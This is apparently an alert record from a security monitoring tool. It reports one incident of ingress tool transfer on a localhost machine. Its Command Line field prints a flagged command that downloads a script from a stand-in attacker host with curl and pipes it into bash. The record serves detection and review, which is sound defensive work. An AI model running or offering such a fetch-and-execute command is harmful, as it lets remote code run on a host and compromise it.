Incident Overview

Incident ID: CINC-20251220-A068DF82
Severity: Medium (70)
Status: new
Alert Count: 1
Host Count: 1

Timeline

First Seen: 2025-12-13 19:42:03
Last Seen: 2025-12-13 19:42:03
Duration: 0d 0h 0m
Created: 2025-12-20 13:23
Updated: 2026-01-13 15:14

Kill Chain Analysis

Observed Tactics:
Command and Control
Techniques:
Ingress Tool Transfer

Affected Hosts (1)

localhost.localdomain

Related Alerts (1)

Severity: High
Status: new
Hostname: localhost.localdomain
Description: An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected.
Tactic: Command and Control
Command Line: /bin/sh -c curl http://evil.com/shell|bash
Time: 12-13 19:42